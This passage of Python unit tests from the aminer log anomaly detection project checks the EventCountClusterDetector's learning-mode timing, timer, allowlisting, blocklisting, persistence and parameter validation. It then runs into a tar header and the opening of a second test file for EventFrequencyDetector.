self.assertTrue(eccd.receive_atom(log_atom1)) self.assertFalse(eccd.learn_mode) # stop_learning_no_anomaly_time eccd = EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=["/p/value"], id_path_list=["/p/id"], window_size=10, num_windows=50, confidence_factor=0.5, idf=True, norm=False, add_normal=False, check_empty_windows=False, learn_mode=True, output_logline=False, stop_learning_no_anomaly_time=100) log_atom1.atom_time = t 
self.assertTrue(eccd.receive_atom(log_atom1)) log_atom1.atom_time = t + 100 self.assertTrue(eccd.receive_atom(log_atom1)) self.assertTrue(eccd.learn_mode) log_atom2.atom_time = t + 100 self.assertTrue(eccd.receive_atom(log_atom2)) self.assertTrue(eccd.learn_mode) log_atom1.atom_time = t + 200 self.assertTrue(eccd.receive_atom(log_atom3)) self.assertTrue(eccd.learn_mode) log_atom1.atom_time = t + 201 self.assertTrue(eccd.receive_atom(log_atom1)) self.assertFalse(eccd.learn_mode) def test2do_timer(self): """Test if the do_timer method is implemented properly.""" eccd = EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler]) t = time.time() eccd.next_persist_time = t + 400 self.assertEqual(eccd.do_timer(t + 200), 200) self.assertEqual(eccd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(eccd.do_timer(t + 999), 1) self.assertEqual(eccd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3allowlist_event(self): """Test if the allowlist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. eccd = EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler]) analysis = "Analysis.%s" self.assertRaises(Exception, eccd.allowlist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The EventCountClusterDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, eccd.allowlist_event, analysis % eccd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(eccd.allowlist_event(analysis % eccd.__class__.__name__, "/s1", None), "Allowlisted path %s in %s." 
% ("/s1", analysis % eccd.__class__.__name__)) self.assertEqual(eccd.constraint_list, ["/s1"]) eccd.learn_mode = False self.assertEqual(eccd.allowlist_event(analysis % eccd.__class__.__name__, "/d1", None), "Allowlisted path %s in %s." % ("/d1", analysis % eccd.__class__.__name__)) self.assertEqual(eccd.constraint_list, ["/s1", "/d1"]) def test4blocklist_event(self): """Test if the blocklist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. eccd = EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler]) analysis = "Analysis.%s" self.assertRaises(Exception, eccd.blocklist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The EventCountClusterDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, eccd.blocklist_event, analysis % eccd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(eccd.blocklist_event(analysis % eccd.__class__.__name__, "/s1", None), "Blocklisted path %s in %s." % ("/s1", analysis % eccd.__class__.__name__)) self.assertEqual(eccd.ignore_list, ["/s1"]) eccd.learn_mode = False self.assertEqual(eccd.blocklist_event(analysis % eccd.__class__.__name__, "/d1", None), "Blocklisted path %s in %s." 
% ("/d1", analysis % eccd.__class__.__name__)) self.assertEqual(eccd.ignore_list, ["/s1", "/d1"]) def test5persistence(self): """Test the do_persist and load_persistence_data methods.""" t = time.time() eccd = EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=["/p/value"], id_path_list=["/p/id"], window_size=10, num_windows=50, confidence_factor=0.5, idf=True, norm=False, add_normal=False, check_empty_windows=False, learn_mode=True, output_logline=False) m1 = MatchElement("/p/value", b"a", b"a", None) m2 = MatchElement("/p/id", b"x", b"x", None) log_atom1 = LogAtom(b"ax", ParserMatch(MatchElement("/p", b"ax", b"ax", [m1, m2])), t + 1, None) m3 = MatchElement("/p/value", b"a", b"a", None) m4 = MatchElement("/p/id", b"y", b"y", None) log_atom2 = LogAtom(b"ay", ParserMatch(MatchElement("/p", b"ay", b"ay", [m3, m4])), t + 2, None) m5 = MatchElement("/p/value", b"b", b"b", None) m6 = MatchElement("/p/id", b"x", b"x", None) log_atom3 = LogAtom(b"bx", ParserMatch(MatchElement("/p", b"bx", b"bx", [m5, m6])), t + 3, None) # Start of window 2: m7 = MatchElement("/p/value", b"a", b"a", None) m8 = MatchElement("/p/id", b"x", b"x", None) log_atom4 = LogAtom(b"ax", ParserMatch(MatchElement("/p", b"ax", b"ax", [m7, m8])), t + 13, None) m9 = MatchElement("/p/value", b"a", b"a", None) m10 = MatchElement("/p/id", b"y", b"y", None) log_atom5 = LogAtom(b"ay", ParserMatch(MatchElement("/p", b"ay", b"ay", [m9, m10])), t + 14, None) m11 = MatchElement("/p/value", b"b", b"b", None) m12 = MatchElement("/p/id", b"x", b"x", None) log_atom6 = LogAtom(b"bx", ParserMatch(MatchElement("/p", b"bx", b"bx", [m11, m12])), t + 15, None) m13 = MatchElement("/p/value", b"a", b"a", None) m14 = MatchElement("/p/id", b"x", b"x", None) log_atom7 = LogAtom(b"ax", ParserMatch(MatchElement("/p", b"ax", b"ax", [m13, m14])), t + 16, None) # Start of window 3: m15 = MatchElement("/p/value", b"c", b"c", None) m16 = MatchElement("/p/id", b"x", b"x", None) log_atom8 
= LogAtom(b"cx", ParserMatch(MatchElement("/p", b"cx", b"cx", [m15, m16])), t + 23, None) m17 = MatchElement("/p/value", b"b", b"b", None) m18 = MatchElement("/p/id", b"x", b"x", None) log_atom9 = LogAtom(b"bx", ParserMatch(MatchElement("/p", b"bx", b"bx", [m17, m18])), t + 24, None) # Start of window 4: m19 = MatchElement("/p/value", b"a", b"a", None) m20 = MatchElement("/p/id", b"x", b"x", None) log_atom10 = LogAtom(b"ax", ParserMatch(MatchElement("/p", b"ax", b"ax", [m19, m20])), t + 43, None) eccd.receive_atom(log_atom1) eccd.receive_atom(log_atom2) eccd.receive_atom(log_atom3) eccd.receive_atom(log_atom4) eccd.receive_atom(log_atom5) eccd.receive_atom(log_atom6) eccd.receive_atom(log_atom7) eccd.receive_atom(log_atom8) eccd.receive_atom(log_atom9) eccd.receive_atom(log_atom10) eccd.do_persist() self.maxDiff = None with open(eccd.persistence_file_name, "r") as f: self.assertEqual(f.read(), '[[[["string:x"], [[[["string:a"], 1], [["string:b"], 1]], [[["string:b"], 1], [["string:c"], 1]]]], [["string:y"], [[[["string:a"], 1]]]]], [["string:x"], ["string:y"]], [[["string:a"], [["string:x"], ["string:y"]]], [["string:b"], [["string:x"]]], [["string:c"], [["string:x"]]]]]') self.assertEqual(eccd.known_counts, {('x',): [{('a',): 1, ('b',): 1}, {('c',): 1, ('b',): 1}], ('y',): [{('a',): 1}]}) self.assertEqual(eccd.idf_total, {('x',), ('y',)}) self.assertEqual(eccd.idf_counts, {('a',): {('x',), ('y',)}, ('b',): {('x',)}, ('c',): {('x',)}}) eccd.load_persistence_data() self.assertEqual(eccd.known_counts, {('x',): [{('a',): 1, ('b',): 1}, {('c',): 1, ('b',): 1}], ('y',): [{('a',): 1}]}) self.assertEqual(eccd.idf_total, {('x',), ('y',)}) self.assertEqual(eccd.idf_counts, {('a',): {('x',), ('y',)}, ('b',): {('x',)}, ('c',): {('x',)}}) other = EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=["/p/value"], id_path_list=["/p/id"], window_size=10, num_windows=50, confidence_factor=0.5, idf=True, norm=False, add_normal=False, 
check_empty_windows=False, learn_mode=True, output_logline=False) self.assertEqual(other.known_counts, eccd.known_counts) self.assertEqual(other.idf_total, eccd.idf_total) self.assertEqual(other.idf_counts, eccd.idf_counts) def test6validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, ["default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, None) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, "") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, 123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, 123.3) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, {"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, ()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, set()) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=[""]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list="") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, 
[self.stream_printer_event_handler], target_path_list=123.3) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=[]) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=None) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=-1) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=0) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], window_size="123") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], window_size={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=[]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], window_size=100) 
EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], window_size=100.22) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=[""]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list="") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=123.3) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=[]) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=None) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=-1) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=0) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=100.22) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, 
[self.stream_printer_event_handler], num_windows=b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows="123") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=[]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], num_windows=100) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=-1) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=1.1) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor="123") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=[]) self.assertRaises(TypeError, 
EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], confidence_factor=0) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], confidence_factor=0.5) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], confidence_factor=1) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], idf=True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], idf=b"True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], idf="True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], idf=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], idf=123.22) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], idf={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], idf=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], idf=[]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], idf=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, 
[self.stream_printer_event_handler], id_path_list=["/model/id"], idf=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], idf=True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], norm=b"True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], norm="True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], norm=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], norm=123.22) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], norm={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], norm=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], norm=[]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], norm=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], norm=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], norm=True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], add_normal=b"True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], add_normal="True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], add_normal=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], add_normal=123.22) self.assertRaises(TypeError, 
EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], add_normal={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], add_normal=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], add_normal=[]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], add_normal=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], add_normal=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], add_normal=True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], check_empty_windows=b"True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], check_empty_windows="True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], check_empty_windows=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], check_empty_windows=123.22) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], check_empty_windows={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], check_empty_windows=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], check_empty_windows=[]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], check_empty_windows=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], 
check_empty_windows=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], check_empty_windows=True) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id="") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=None) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=123.22) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=[]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], persistence_id="Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=b"True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], 
learn_mode="True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=123.22) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=[]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=None) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=b"True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline="True") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=123.22) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], 
output_logline=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=[]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], output_logline=True) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=[""]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list="") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=123.3) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], ignore_list=[]) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], ignore_list=None) self.assertRaises(ValueError, EventCountClusterDetector, 
self.aminer_config, [self.stream_printer_event_handler], constraint_list=[""]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list="") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=123.3) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], constraint_list=[]) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], constraint_list=None) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, 
stop_learning_time="123") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, 
[self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list="") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=123.22) self.assertRaises(TypeError, EventCountClusterDetector, 
self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/EventFrequencyDetectorTest.py000066400000000000000000001447371500476301700314720ustar00rootroot00000000000000import unittest import time from datetime import datetime from aminer.analysis.EventFrequencyDetector import EventFrequencyDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class EventFrequencyDetectorTest(TestBase): 